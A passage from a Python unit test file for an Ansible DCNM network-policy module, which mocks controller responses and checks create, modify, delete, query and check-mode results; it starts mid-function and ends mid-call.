    # delete with a second pass: after mark-delete + deploy, each policy
    # is fetched again and hard-deleted, followed by a final deploy.
    if ('test_dcnm_policy_delete_with_template_name_with_second_delete' == self._testMethodName):
        have_resp_101_105 = self.payloads_data.get('have_response_101_105')
        get_response_101 = self.payloads_data.get('get_response_101')
        get_response_102 = self.payloads_data.get('get_response_102')
        get_response_103 = self.payloads_data.get('get_response_103')
        get_response_104 = self.payloads_data.get('get_response_104')
        get_response_105 = self.payloads_data.get('get_response_105')
        mark_delete_resp_101 = self.payloads_data.get('mark_delete_response_101')
        mark_delete_resp_102 = self.payloads_data.get('mark_delete_response_102')
        mark_delete_resp_103 = self.payloads_data.get('mark_delete_response_103')
        mark_delete_resp_104 = self.payloads_data.get('mark_delete_response_104')
        mark_delete_resp_105 = self.payloads_data.get('mark_delete_response_105')
        delete_config_save_resp = self.payloads_data.get('delete_config_deploy_response_101_105')
        delete_resp_101 = self.payloads_data.get('delete_response_101')
        delete_resp_102 = self.payloads_data.get('delete_response_102')
        delete_resp_103 = self.payloads_data.get('delete_response_103')
        delete_resp_104 = self.payloads_data.get('delete_response_104')
        delete_resp_105 = self.payloads_data.get('delete_response_105')

        self.run_dcnm_send.side_effect = [have_resp_101_105,
                                          mark_delete_resp_101, mark_delete_resp_102,
                                          mark_delete_resp_103, mark_delete_resp_104,
                                          mark_delete_resp_105, delete_config_save_resp,
                                          get_response_101, delete_resp_101,
                                          get_response_102, delete_resp_102,
                                          get_response_103, delete_resp_103,
                                          get_response_104, delete_resp_104,
                                          get_response_105, delete_resp_105,
                                          delete_config_save_resp
                                          ]
    # query flows need only the single 'have' (or per-id GET) responses.
    if ('test_dcnm_policy_query_with_switch_info' == self._testMethodName):
        have_resp_101_105 = self.payloads_data.get('have_response_101_105')

        self.run_dcnm_send.side_effect = [have_resp_101_105,
                                          ]
    if ('test_dcnm_policy_query_with_policy_id' == self._testMethodName):
        get_resp_101 = self.payloads_data.get('get_response_101')
        get_resp_102 = self.payloads_data.get('get_response_102')
        get_resp_103 = self.payloads_data.get('get_response_103')
        get_resp_104 = self.payloads_data.get('get_response_104')
        get_resp_105 = self.payloads_data.get('get_response_105')

        self.run_dcnm_send.side_effect = [get_resp_101,
                                          get_resp_102, get_resp_103, get_resp_104,
                                          get_resp_105
                                          ]
    if ('test_dcnm_policy_query_with_template_name' == self._testMethodName):
        have_resp_101_105 = self.payloads_data.get('have_response_101_105')

        self.run_dcnm_send.side_effect = [have_resp_101_105,
                                          ]
    if ('test_dcnm_policy_query_with_template_name_match_multi' == self._testMethodName):
        have_resp_101_105_multi = self.payloads_data.get('have_response_101_105_multi')

        self.run_dcnm_send.side_effect = [have_resp_101_105_multi,
                                          ]
def load_fixtures(self, response=None, device=''):
    """Base-class hook: install all mock side effects before a test runs.

    :param response: unused here; part of the base-class hook signature.
    :param device: unused here; part of the base-class hook signature.
    """
    # setup the side effects
    # self.mock_fab_inv / self.mock_ip_sn are set by each test method
    # before execute_module() triggers this hook.
    self.run_dcnm_fabric_details.side_effect = [self.mock_fab_inv]
    self.run_dcnm_ip_sn.side_effect = [[self.mock_ip_sn, []]]

    # Load policy related side-effects
    self.load_policy_fixtures ()
#################################### FIXTURES END ############################
#################################### TEST-CASES ##############################
def test_dcnm_policy_merged_new(self):
    """Merged state: five new policies are created and deployed."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_101_105')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 5)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 5)

    # The first <created> responses are per-policy creates; the one after
    # them is the aggregate deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 5,
                True)
def test_dcnm_policy_merged_same_template(self):
    """Merged state: five policies that reuse the same template are created."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_101_101_5')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 5)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 5)

    # Per-policy create responses, then one aggregate deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 5,
                True)
def test_dcnm_policy_merged_new_check_mode(self):
    """Merged state in check mode: diffs are computed but nothing is sent."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_101_105')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         _ansible_check_mode=True,
                         config=self.playbook_config))
    result = self.execute_module(changed=False, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 5)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 5)
    # Check mode must not issue any requests, so there are no responses.
    self.assertEqual(len(result["response"]), 0)
def test_dcnm_policy_merged_existing(self):
    """Idempotence: merging policies that already exist creates nothing new."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_101_105')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 0)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 5)

    # No creates happened, so only the aggregate deploy response (index
    # == created, i.e. index 0 here) is validated.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            continue
        if idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 5,
                True)
def test_dcnm_policy_merged_existing_and_non_exist(self):
    """Partial idempotence: only the two missing policies are created."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_101_105')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 2)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 5)

    # Per-policy create responses, then one aggregate deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 5,
                True)
def test_dcnm_policy_without_state(self):
    """Omitting 'state' defaults to merged behavior: two policies created."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_without_state_104_105')

    # Note: no 'state' key — the module default is exercised here.
    set_module_args(dict(deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 2)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 2)

    # Per-policy create responses, then one aggregate deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 2,
                True)
def test_dcnm_policy_merge_additional_policies(self):
    """Merged state with additional per-policy flags: two policies created."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_additional_flags_104')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 2)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 2)

    # Per-policy create responses, then one aggregate deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 2,
                True)
def test_dcnm_policy_merge_additional_policies_exist(self):
    """Merged state with additional flags when matching policies already exist."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_additional_flags_104')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 2)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 2)

    # Per-policy create responses, then one aggregate deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 2,
                True)
def test_dcnm_policy_merge_multiple_switches(self):
    """Merged state fanning policies out across multiple switches."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_multi_switch_101_105')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 8)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 8)

    # Per-policy create responses, then one deploy response that carries a
    # per-switch entry (2 + 3 + 3 policies across the three switches).
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 2,
                True)
            self.assertEqual(
                len(resp["DATA"][1]["successPTIList"].split(",")) == 3,
                True)
            self.assertEqual(
                len(resp["DATA"][2]["successPTIList"].split(",")) == 3,
                True)
def test_dcnm_policy_merge_no_deploy(self):
    """Merged state without a 'deploy' argument: default deploy behavior."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_101_105')

    # Note: no 'deploy' key — the module default is exercised here.
    set_module_args(dict(state='merged',
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 5)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 5)

    # Per-policy create responses, then one aggregate deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 5,
                True)
def test_dcnm_policy_merge_deploy_false(self):
    """Merged state with deploy=False: policy created, nothing deployed."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_no_deploy_104')

    set_module_args(dict(state='merged',
                         deploy=False,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 1)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 0)

    # Only create responses are expected; reaching the index that would
    # hold a deploy response fails the test (idx < created is False there).
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(idx < created, True)
def test_dcnm_policy_merged_new_with_vars(self):
    """Merged state with template variables: three policies created."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('create_policy_125_127_with_vars')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 3)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 3)

    # Per-policy create responses, then one aggregate deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 3,
                True)
def test_dcnm_policy_modify_with_template_name(self):
    """Merged state modifying one existing policy selected by template name."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('modify_policy_104_with_template_name')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 1)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 1)

    # One create/modify response followed by one deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 1,
                True)
def test_dcnm_policy_modify_with_policy_id(self):
    """Merged state modifying one existing policy selected by policy id."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('modify_policy_104_with_policy_id')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 1)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 1)
    self.assertEqual(len(diff["skipped"]), 0)

    # One create/modify response followed by one deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 1,
                True)
def test_dcnm_policy_modify_policy_with_vars(self):
    """Merged state modifying a policy whose template carries variables."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('modify_policy_125_with_vars')

    set_module_args(dict(state='merged',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 1)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 1)
    self.assertEqual(len(diff["skipped"]), 0)

    # One create/modify response followed by one deploy response.
    created = len(diff["merged"])
    for idx, resp in enumerate(result["response"]):
        if idx < created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                "is created successfully" in resp["DATA"]["successList"][0]["message"],
                True)
        elif idx == created:
            self.assertEqual(resp["RETURN_CODE"], 200)
            self.assertEqual(
                len(resp["DATA"][0]["successPTIList"].split(",")) == 1,
                True)
def test_dcnm_policy_delete_with_template_name(self):
    """Deleted state: remove five policies selected by template name."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('delete_policy_template_name_101_105')

    set_module_args(dict(state='deleted',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 0)
    self.assertEqual(len(diff["deleted"]), 5)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 0)
    self.assertEqual(len(diff["skipped"]), 0)

    # Responses arrive in three phases: per-policy mark-delete, one
    # config-save/deploy, then per-policy delete confirmations.
    marked = len(diff["deleted"])
    for idx, resp in enumerate(result["response"]):
        self.assertEqual(resp["RETURN_CODE"], 200)
        if idx < marked:
            self.assertEqual(resp["DATA"]["deleted"] == True, True)
        elif idx == marked:
            self.assertEqual(
                "Config deployment has been triggered" in resp["DATA"]["status"],
                True)
        else:
            self.assertEqual(
                "Deleted successfully" in resp["DATA"]["message"],
                True)
def test_dcnm_policy_delete_with_policy_id(self):
    """Deleted state: remove five policies selected by policy id."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('delete_policy_policy_id_101_105')

    set_module_args(dict(state='deleted',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 0)
    self.assertEqual(len(diff["deleted"]), 5)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 0)
    self.assertEqual(len(diff["skipped"]), 0)

    # Responses arrive in three phases: per-policy mark-delete, one
    # config-save/deploy, then per-policy delete confirmations.
    marked = len(diff["deleted"])
    for idx, resp in enumerate(result["response"]):
        self.assertEqual(resp["RETURN_CODE"], 200)
        if idx < marked:
            self.assertEqual(resp["DATA"]["deleted"] == True, True)
        elif idx == marked:
            self.assertEqual(
                "Config deployment has been triggered" in resp["DATA"]["status"],
                True)
        else:
            self.assertEqual(
                "Deleted successfully" in resp["DATA"]["message"],
                True)
def test_dcnm_policy_delete_multiple_policies_with_template_name(self):
    """Deleted state: a template name matching multiple policies removes all eight."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('delete_policy_template_name_multi')

    set_module_args(dict(state='deleted',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 0)
    self.assertEqual(len(diff["deleted"]), 8)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 0)
    self.assertEqual(len(diff["skipped"]), 0)

    # Responses arrive in three phases: per-policy mark-delete, one
    # config-save/deploy, then per-policy delete confirmations.
    marked = len(diff["deleted"])
    for idx, resp in enumerate(result["response"]):
        self.assertEqual(resp["RETURN_CODE"], 200)
        if idx < marked:
            self.assertEqual(resp["DATA"]["deleted"] == True, True)
        elif idx == marked:
            self.assertEqual(
                "Config deployment has been triggered" in resp["DATA"]["status"],
                True)
        else:
            self.assertEqual(
                "Deleted successfully" in resp["DATA"]["message"],
                True)
def test_dcnm_policy_delete_with_template_name_with_second_delete(self):
    """Deleted state where the delete flow needs a second delete pass.

    Only the return codes are validated here; the response bodies differ
    between the first and second delete attempts.
    """
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    # load required config data
    self.playbook_config = self.config_data.get('delete_policy_template_name_101_105')

    set_module_args(dict(state='deleted',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    result = self.execute_module(changed=True, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 0)
    self.assertEqual(len(diff["deleted"]), 5)
    self.assertEqual(len(diff["query"]), 0)
    self.assertEqual(len(diff["deploy"]), 0)
    self.assertEqual(len(diff["skipped"]), 0)

    # Every response (mark-delete, deploy, and both delete passes) must
    # succeed.  (The original also computed an unused max_count local,
    # which has been removed.)
    for resp in result["response"]:
        self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_policy_query_with_switch_info(self):
    """Query state: list the five policies attached to a given switch."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('query_policy_with_switch_info')

    set_module_args(dict(state='query',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    # Queries never change state.
    result = self.execute_module(changed=False, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 0)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 5)
    self.assertEqual(len(diff["deploy"]), 0)
    self.assertEqual(len(diff["skipped"]), 0)
    self.assertEqual(len(result["response"]) == 5, True)
def test_dcnm_policy_query_with_policy_id(self):
    """Query state: fetch five policies individually by policy id."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('query_policy_with_policy_id')

    set_module_args(dict(state='query',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    # Queries never change state.
    result = self.execute_module(changed=False, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 0)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 5)
    self.assertEqual(len(diff["deploy"]), 0)
    self.assertEqual(len(diff["skipped"]), 0)
    self.assertEqual(len(result["response"]) == 5, True)
def test_dcnm_policy_query_with_template_name(self):
    """Query state: fetch policies by template name, one match each."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('query_policy_with_template_name')

    set_module_args(dict(state='query',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    # Queries never change state.
    result = self.execute_module(changed=False, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 0)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 5)
    self.assertEqual(len(diff["deploy"]), 0)
    self.assertEqual(len(diff["skipped"]), 0)
    self.assertEqual(len(result["response"]) == 5, True)
def test_dcnm_policy_query_with_template_name_match_multi(self):
    """Query state: a template name matching multiple policies returns all of them."""
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    self.playbook_config = self.config_data.get('query_policy_with_template_name')

    set_module_args(dict(state='query',
                         deploy=True,
                         fabric='mmudigon',
                         config=self.playbook_config))
    # Queries never change state.
    result = self.execute_module(changed=False, failed=False)

    diff = result["diff"][0]
    self.assertEqual(len(diff["merged"]), 0)
    self.assertEqual(len(diff["deleted"]), 0)
    self.assertEqual(len(diff["query"]), 5)
    self.assertEqual(len(diff["deploy"]), 0)
    self.assertEqual(len(diff["skipped"]), 0)
    # Five query entries expand to eight matching policies in the responses.
    self.assertEqual(len(result["response"]) == 8, True)
def test_dcnm_policy_wrong_state(self):
    """An unsupported 'state' value ('replaced') must make the module fail.

    The module is expected to reject the state before producing a result,
    so execute_module never assigns to ``result``.
    """
    # Playbook fixtures and mocked fabric details.
    self.config_data = loadPlaybookData('dcnm_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
    self.mock_fab_inv = []
    self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
    # load required config data
    self.playbook_config = self.config_data.get('create_policy_wrong_state_104')

    set_module_args(dict(state='replaced',
